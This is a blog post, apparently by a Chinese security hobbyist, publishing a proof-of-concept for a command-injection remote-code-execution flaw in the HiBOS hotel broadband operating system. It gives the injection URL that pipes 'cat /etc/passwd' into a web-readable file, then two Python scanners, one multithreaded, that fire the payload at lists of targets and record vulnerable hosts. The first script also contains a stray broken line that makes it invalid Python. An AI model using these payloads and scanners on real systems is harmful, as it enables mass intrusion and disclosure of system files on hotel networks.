Mamor's Blog
0%

HiBOS酒店宽带运营系统RCE漏洞POC

发表于 分类于
本文字数: 4.4k 阅读时长 ≈ 4 分钟 
1
2
3
4
5
6
payload 
url + /manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../aaa.txt&id=1
访问 url + /aaa.txt

如果存在 root:x:0:0:root:/root:/bin/bash
说明漏洞存在

v0.1单线程版 后续完善 用法 python3 poc.py -u url python3 poc.py -f url.txt 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
import requests
import urllib3
from optparse import OptionParser
urllib3.disable_warnings()

header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
}
def banner():
    print("*-----------------------------------*")
    print("*  HiBOS酒店宽带运营系统RCE漏洞POCv0.1  *")
    print("*                      Mamor        *")
    print("     -f ,--file urls.txt             ")
    print("*-----------------------------------*")

def parse_url(url):
    try:
        if 'https://' not in url:
            if 'http://' in url:
                url.replace("http://","https://")
            else:
                url = "https://" + url
        else:
            pass
    except:
        print("[*]url形式不符合! %s [*]" % url)
    return url

def exp(url):
    payload = '/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd%20>../../aaa.txt&id=1'
    url1 = url + payload
%20>../../aaa.txt&id=1'
    req = requests.get(url=url1, headers=header, verify=False)

    url2 = url + '/aaa.txt'
    
    req2 = requests.get(url=url2, headers=header, verify=False)
    if 'root:x:0:0:root:/root:/bin/bash' in req2.text:
        print("[*] url:" + url + "--------------存在漏洞[*]")
    else:
        print("[*] url:" + url + "-------------不存在漏洞[*]")
def main():
    parser = OptionParser()
    parser.add_option("-u", "--url", dest="url", default = '' , type=str, help='输入url')
    parser.add_option("-f", "--file", dest="file", default= '', help='收集的txt')
    (option, args) = parser.parse_args()
    # print(parser.parse_args())
    url = option.url
    file = option.file

    if file != '':
        print("[*] Start .......              [*]")
        with open(file,'r') as f:
            for line in f.readlines():
                url = line.strip()
                url = parse_url(url)
                exp(url)

        print("[*] End .......                [*]")

    if url !='':
        exp(url)

if __name__ == '__main__':
    banner()
    main()

使用多线程 把结果存处output.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
import requests
import urllib3
import threading
from optparse import OptionParser
urllib3.disable_warnings()

thread = []

header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
}
def banner():
    print("*-----------------------------------*")
    print("*  HiBOS酒店宽带运营系统RCE漏洞POCv0.2  *")
    print("*                      Mamor        *")
    print("     -u ,--url url                   ")
    print("     -f ,--file urls.txt             ")
    print("*-----------------------------------*")

def parse_url(url):
    try:
        if 'https://' not in url:
            if 'http://' in url:
                url.replace("http://","https://")
            else:
                url = "https://" + url
        else:
            pass
    except:
        print("[*]url形式不符合! %s [*]" % url)
    return url

def exp(url):
    payload = '/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd%20>../../aaa.txt&id=1'
    url1 = url + payload
    req = requests.get(url=url1, headers=header, verify=False)
    # print(req.status_code)

    url2 = url + '/aaa.txt'
    # print(url2)
    req2 = requests.get(url=url2, headers=header, verify=False)
    if 'root:x:0:0:root:/root:/bin/bash' in req2.text:
        print("[*] url:" + url + "--------------存在漏洞[*]")
        output = open('output.txt', "a+")  
        output.write(url + '\n')
        output.close()
    else:
        print("[*] url:" + url + "-------------不存在漏洞[*]")
def main():
    parser = OptionParser()
    parser.add_option("-u", "--url", dest="url", default = '' , type=str, help='输入url')
    parser.add_option("-f", "--file", dest="file", default= '', help='收集的txt')
    (option, args) = parser.parse_args()
    # print(parser.parse_args())
    url = option.url
    file = option.file

    if file != '':
        print("[*] Start .......              [*]")
        with open(file,'r') as f:
            for line in f.readlines():
                url = line.strip()
                url = parse_url(url)

                t = threading.Thread(target=exp, args=(url,))
                thread.append(t)
        print(thread)
        for t in thread:
            t.start()
        for t in thread:
            t.join()
                # exp(url)

        print("[*] End .......                [*]")

    if url !='':
        exp(url)

if __name__ == '__main__':
    banner()
    main()

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------